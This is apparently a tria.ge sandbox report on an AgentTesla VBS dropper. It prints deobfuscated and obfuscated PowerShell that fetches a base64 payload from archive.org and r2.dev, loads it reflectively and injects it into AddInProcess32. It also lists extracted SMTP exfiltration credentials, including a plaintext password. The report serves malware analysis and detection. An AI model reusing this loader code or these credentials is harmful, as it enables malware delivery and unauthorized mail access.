Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    94s
  • max time network
    96s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02/10/2024, 03:29 UTC

General

  • Target

    c7f2358c6d043c69480de7d6bcffb1fc6c6467e21e5b3be0c84b6274d03ba284.vbs

  • Size

    491KB

  • MD5

    8619103fa6e661049111f4bbdd7fe0d2

  • SHA1

    ca586ed66ab95510af2af9fb380575e885f3c6eb

  • SHA256

    c7f2358c6d043c69480de7d6bcffb1fc6c6467e21e5b3be0c84b6274d03ba284

  • SHA512

    d649b396c6e3dcb8fa0517a9a157a17f8842e9c0899510ced40c04d557b3d3ea0dbd70a1236fff519ebbe9ea9c64426cbc8ae048b98995e51c501eed48896d2b

  • SSDEEP

    12288:NNjXVkBaQoLDBqKKcoXOZzIWPkETDuQnL3Qu5toTmP18cEuL9M7y8q8+01SB0WKg:y4cUteD9aS4Bh

Malware Config

Extracted

Language
ps1
Deobfuscated
1
# powershell snippet 0
2
invoke-expression "$url = 'https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt';$base64Content = (New-Object System.Net.WebClient).DownloadString($url);$binaryContent = [System.Convert]::FromBase64String($base64Content);$assembly = [Reflection.Assembly]::Load($binaryContent);$type = $assembly.GetType('RunPE.Home');$method = $type.GetMethod('VAI');$method.Invoke($null, [object[]]@('txt.yldrfoce/ved.2r.d438f7155cc6eea92d14e607737281c4-bup//:sptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))"
3
4
# powershell snippet 1
5
$url = "https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt"
6
$base64content = (new-object system.net.webclient).downloadstring("https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt")
7
$binarycontent = [system.convert]::frombase64string($base64content)
8
$assembly = [reflection.assembly]::load($binarycontent)
9
$type = $assembly.gettype("RunPE.Home")
10
$method = $type.getmethod("VAI")
11
$method.invoke($null, [object[]]"txt.yldrfoce/ved.2r.d438f7155cc6eea92d14e607737281c4-bup//:sptth", "desativado", "desativado", "desativado", "AddInProcess32", "")
12
URLs
ps1.dropper

https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt

exe.dropper

https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt

Extracted

Family

agenttesla

Credentials

  • Protocol:
    smtp
  • Host:
    mail.dai-logistic.co.id
  • Port:
    587
  • Username:
    ops.domestic@dai-logistic.co.id
  • Password:
    domestic1234
  • Email To:
    federicornanetti1990@gmail.com

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c7f2358c6d043c69480de7d6bcffb1fc6c6467e21e5b3be0c84b6274d03ba284.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4668
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtzVFJJTmddJFZlUmJvU2VwUmVGRVJFbkNlKVsxLDNdKyd4Jy1qb0lOJycpICggKCdadFMnKyd1cmwgPSAnKyduY2EnKydodHQnKydwczovJysnL2lhNicrJzAnKycwMTAwLnVzLmFyY2hpJysndmUuJysnbycrJ3JnJysnLzInKyc0L2l0ZW1zJysnLycrJ2RldGEnKydoLW5vJysndGUtdi9EJysnZXRhaE4nKydvdGVWLnR4dG4nKydjYTtadFNiYXMnKydlJysnNjRDb250ZScrJ250ICcrJz0gJysnKCcrJ05ldy1PYmplY3QgU3knKydzdGVtLk5ldC5XZWJDbGllbnQpLkRvd24nKydsJysnb2FkUycrJ3RyaScrJ25nKFp0U3VybCcrJyk7WicrJ3QnKydTJysnYmluJysnYXJ5Q29udGVudCA9JysnIFtTeScrJ3N0ZScrJ20uQ29udmUnKydyJysndCcrJ106JysnOkYnKydyb21CYXNlNjRTdHJpJysnbmcoWicrJ3RTYmEnKydzZTY0Q29udGVudCk7JysnWicrJ3RTJysnYXNzZW1ibHkgPScrJyBbUicrJ2VmbGVjdGlvbi5BJysnc3NlbWJseV0nKyc6OkwnKydvYWQoJysnWnRTYicrJ2knKyduJysnYXJ5Q29udGVudCcrJyk7WnRTdHlwZSA9IFp0U2FzJysnc2UnKydtYmx5LicrJ0dldFR5cGUoJysnbicrJ2NhUnVuUEUuJysnSG9tZW5jJysnYSk7WnRTbScrJ2V0aG9kID0gWicrJ3RTdHlwJysnZScrJy5HZXRNJysnZScrJ3RoJysnb2QobmNhVicrJ0FJbmNhJysnKTtadFNtZXQnKydobycrJ2QuSW52Jysnb2tlKFp0U24nKyd1bGwsJysnIFtvYmonKydlY3RbXV1AKCcrJ25jYXR4dC55bGQnKydyZm9jZS92ZWQuMnIuZDQzOCcrJ2Y3MTU1Y2M2ZScrJ2VhOTJkJysnMScrJzRlNicrJzAnKyc3NycrJzMnKyc3MjgnKycxYzQtYicrJ3UnKydwLy86Jysnc3AnKyd0dGhuYycrJ2EnKycgLCBuY2FkJysnZXNhdCcrJ2l2YWRvbmNhICwgJysnbmNhZCcrJ2VzYXRpJysndmFkb24nKydjYSAsJysnICcrJ25jYWRlc2EnKyd0aXZhZG8nKyduJysnY2EnKycsbmNhQScrJ2RkSW4nKydQcm9jZXNzMzJuJysnYycrJ2EsJysnbmNhJysnbmNhKSknKS5SZVBsQWNlKCduY2EnLFtTVFJJTmddW0NIYVJdMzkpLlJlUGxBY2UoJ1p0UycsJyQnKSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1104
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([sTRINg]$VeRboSepReFEREnCe)[1,3]+'x'-joIN'') ( ('ZtS'+'url = '+'nca'+'htt'+'ps:/'+'/ia6'+'0'+'0100.us.archi'+'ve.'+'o'+'rg'+'/2'+'4/items'+'/'+'deta'+'h-no'+'te-v/D'+'etahN'+'oteV.txtn'+'ca;ZtSbas'+'e'+'64Conte'+'nt '+'= '+'('+'New-Object Sy'+'stem.Net.WebClient).Down'+'l'+'oadS'+'tri'+'ng(ZtSurl'+');Z'+'t'+'S'+'bin'+'aryContent ='+' [Sy'+'ste'+'m.Conve'+'r'+'t'+']:'+':F'+'romBase64Stri'+'ng(Z'+'tSba'+'se64Content);'+'Z'+'tS'+'assembly ='+' [R'+'eflection.A'+'ssembly]'+'::L'+'oad('+'ZtSb'+'i'+'n'+'aryContent'+');ZtStype = ZtSas'+'se'+'mbly.'+'GetType('+'n'+'caRunPE.'+'Homenc'+'a);ZtSm'+'ethod = Z'+'tStyp'+'e'+'.GetM'+'e'+'th'+'od(ncaV'+'AInca'+');ZtSmet'+'ho'+'d.Inv'+'oke(ZtSn'+'ull,'+' [obj'+'ect[]]@('+'ncatxt.yld'+'rfoce/ved.2r.d438'+'f7155cc6e'+'ea92d'+'1'+'4e6'+'0'+'77'+'3'+'728'+'1c4-b'+'u'+'p//:'+'sp'+'tthnc'+'a'+' , ncad'+'esat'+'ivadonca , '+'ncad'+'esati'+'vadon'+'ca ,'+' '+'ncadesa'+'tivado'+'n'+'ca'+',ncaA'+'ddIn'+'Process32n'+'c'+'a,'+'nca'+'nca))').RePlAce('nca',[STRINg][CHaR]39).RePlAce('ZtS','$') )"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1988
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
          4⤵
            PID:116
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2524
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2524 -s 1380
              5⤵
              • Program crash
              PID:4960
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 2524 -ip 2524
      1⤵
        PID:3124

      Network

      • flag-us
        DNS
        8.8.8.8.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        8.8.8.8.in-addr.arpa
        IN PTR
        Response
        8.8.8.8.in-addr.arpa
        IN PTR
        dnsgoogle
      • flag-us
        DNS
        ia600100.us.archive.org
        powershell.exe
        Remote address:
        8.8.8.8:53
        Request
        ia600100.us.archive.org
        IN A
        Response
        ia600100.us.archive.org
        IN A
        207.241.227.240
      • flag-us
        GET
        https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
        powershell.exe
        Remote address:
        207.241.227.240:443
        Request
        GET /24/items/detah-note-v/DetahNoteV.txt HTTP/1.1
        Host: ia600100.us.archive.org
        Connection: Keep-Alive
        Response
        HTTP/1.1 200 OK
        Server: nginx/1.24.0 (Ubuntu)
        Date: Wed, 02 Oct 2024 03:29:12 GMT
        Content-Type: text/plain; charset=utf-8
        Content-Length: 2823512
        Last-Modified: Wed, 11 Sep 2024 23:50:18 GMT
        Connection: keep-alive
        ETag: "66e22cba-2b1558"
        Strict-Transport-Security: max-age=15724800
        Expires: Wed, 02 Oct 2024 09:29:12 GMT
        Cache-Control: max-age=21600
        Access-Control-Allow-Origin: *
        Access-Control-Allow-Headers: Accept-Encoding,Accept-Language,Authorization,Cache-Control,Content-Length,Content-Range,DNT,Pragma,Range,X-Requested-With
        Access-Control-Allow-Credentials: true
        Accept-Ranges: bytes
      • flag-us
        DNS
        149.220.183.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        149.220.183.52.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        83.210.23.2.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        83.210.23.2.in-addr.arpa
        IN PTR
        Response
        83.210.23.2.in-addr.arpa
        IN PTR
        a2-23-210-83deploystaticakamaitechnologiescom
      • flag-us
        DNS
        240.227.241.207.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        240.227.241.207.in-addr.arpa
        IN PTR
        Response
        240.227.241.207.in-addr.arpa
        IN PTR
        ia600100usarchiveorg
      • flag-us
        DNS
        138.32.126.40.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        138.32.126.40.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        pub-4c182737706e41d29aee6cc5517f834d.r2.dev
        powershell.exe
        Remote address:
        8.8.8.8:53
        Request
        pub-4c182737706e41d29aee6cc5517f834d.r2.dev
        IN A
        Response
        pub-4c182737706e41d29aee6cc5517f834d.r2.dev
        IN A
        172.66.0.235
        pub-4c182737706e41d29aee6cc5517f834d.r2.dev
        IN A
        162.159.140.237
      • flag-us
        GET
        https://pub-4c182737706e41d29aee6cc5517f834d.r2.dev/ecofrdly.txt
        powershell.exe
        Remote address:
        172.66.0.235:443
        Request
        GET /ecofrdly.txt HTTP/1.1
        Host: pub-4c182737706e41d29aee6cc5517f834d.r2.dev
        Connection: Keep-Alive
        Response
        HTTP/1.1 200 OK
        Date: Wed, 02 Oct 2024 03:29:16 GMT
        Content-Type: text/plain
        Content-Length: 320172
        Connection: keep-alive
        Accept-Ranges: bytes
        ETag: "19f97dcdc64d9bf636ab2601f9e0f564"
        Last-Modified: Thu, 26 Sep 2024 08:11:26 GMT
        Server: cloudflare
        CF-RAY: 8cc19b6bea93bd74-LHR
      • flag-us
        DNS
        235.0.66.172.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        235.0.66.172.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        13.86.106.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        13.86.106.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        50.23.12.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        50.23.12.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        18.31.95.13.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        18.31.95.13.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        172.210.232.199.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        172.210.232.199.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        43.229.111.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        43.229.111.52.in-addr.arpa
        IN PTR
        Response
      • 207.241.227.240:443
        https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
        tls, http
        powershell.exe
        78.5kB
        2.9MB
        1438
        2099

        HTTP Request

        GET https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt

        HTTP Response

        200
      • 172.66.0.235:443
        https://pub-4c182737706e41d29aee6cc5517f834d.r2.dev/ecofrdly.txt
        tls, http
        powershell.exe
        6.4kB
        335.7kB
        131
        255

        HTTP Request

        GET https://pub-4c182737706e41d29aee6cc5517f834d.r2.dev/ecofrdly.txt

        HTTP Response

        200
      • 8.8.8.8:53
        8.8.8.8.in-addr.arpa
        dns
        66 B
        90 B
        1
        1

        DNS Request

        8.8.8.8.in-addr.arpa

      • 8.8.8.8:53
        ia600100.us.archive.org
        dns
        powershell.exe
        69 B
        85 B
        1
        1

        DNS Request

        ia600100.us.archive.org

        DNS Response

        207.241.227.240

      • 8.8.8.8:53
        149.220.183.52.in-addr.arpa
        dns
        73 B
        147 B
        1
        1

        DNS Request

        149.220.183.52.in-addr.arpa

      • 8.8.8.8:53
        83.210.23.2.in-addr.arpa
        dns
        70 B
        133 B
        1
        1

        DNS Request

        83.210.23.2.in-addr.arpa

      • 8.8.8.8:53
        240.227.241.207.in-addr.arpa
        dns
        74 B
        111 B
        1
        1

        DNS Request

        240.227.241.207.in-addr.arpa

      • 8.8.8.8:53
        138.32.126.40.in-addr.arpa
        dns
        72 B
        158 B
        1
        1

        DNS Request

        138.32.126.40.in-addr.arpa

      • 8.8.8.8:53
        pub-4c182737706e41d29aee6cc5517f834d.r2.dev
        dns
        powershell.exe
        89 B
        121 B
        1
        1

        DNS Request

        pub-4c182737706e41d29aee6cc5517f834d.r2.dev

        DNS Response

        172.66.0.235
        162.159.140.237

      • 8.8.8.8:53
        235.0.66.172.in-addr.arpa
        dns
        71 B
        133 B
        1
        1

        DNS Request

        235.0.66.172.in-addr.arpa

      • 8.8.8.8:53
        13.86.106.20.in-addr.arpa
        dns
        71 B
        157 B
        1
        1

        DNS Request

        13.86.106.20.in-addr.arpa

      • 8.8.8.8:53
        50.23.12.20.in-addr.arpa
        dns
        70 B
        156 B
        1
        1

        DNS Request

        50.23.12.20.in-addr.arpa

      • 8.8.8.8:53
        18.31.95.13.in-addr.arpa
        dns
        70 B
        144 B
        1
        1

        DNS Request

        18.31.95.13.in-addr.arpa

      • 8.8.8.8:53
        172.210.232.199.in-addr.arpa
        dns
        74 B
        128 B
        1
        1

        DNS Request

        172.210.232.199.in-addr.arpa

      • 8.8.8.8:53
        43.229.111.52.in-addr.arpa
        dns
        72 B
        158 B
        1
        1

        DNS Request

        43.229.111.52.in-addr.arpa

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

        Filesize

        3KB

        MD5

        f41839a3fe2888c8b3050197bc9a0a05

        SHA1

        0798941aaf7a53a11ea9ed589752890aee069729

        SHA256

        224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

        SHA512

        2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        64B

        MD5

        50a8221b93fbd2628ac460dd408a9fc1

        SHA1

        7e99fe16a9b14079b6f0316c37cc473e1f83a7e6

        SHA256

        46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e

        SHA512

        27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pvxqxh0y.2oq.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • memory/1104-0-0x00007FFB05A93000-0x00007FFB05A95000-memory.dmp

        Filesize

        8KB

      • memory/1104-10-0x0000020EEA1F0000-0x0000020EEA212000-memory.dmp

        Filesize

        136KB

      • memory/1104-11-0x00007FFB05A90000-0x00007FFB06551000-memory.dmp

        Filesize

        10.8MB

      • memory/1104-12-0x00007FFB05A90000-0x00007FFB06551000-memory.dmp

        Filesize

        10.8MB

      • memory/1104-29-0x00007FFB05A90000-0x00007FFB06551000-memory.dmp

        Filesize

        10.8MB

      • memory/1988-22-0x000001DCA06D0000-0x000001DCA08DC000-memory.dmp

        Filesize

        2.0MB

      • memory/2524-23-0x0000000000400000-0x0000000000440000-memory.dmp

        Filesize

        256KB

      • memory/2524-30-0x0000000005000000-0x00000000055A4000-memory.dmp

        Filesize

        5.6MB

      • memory/2524-31-0x0000000004B50000-0x0000000004BB6000-memory.dmp

        Filesize

        408KB

      We care about your privacy.

      This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.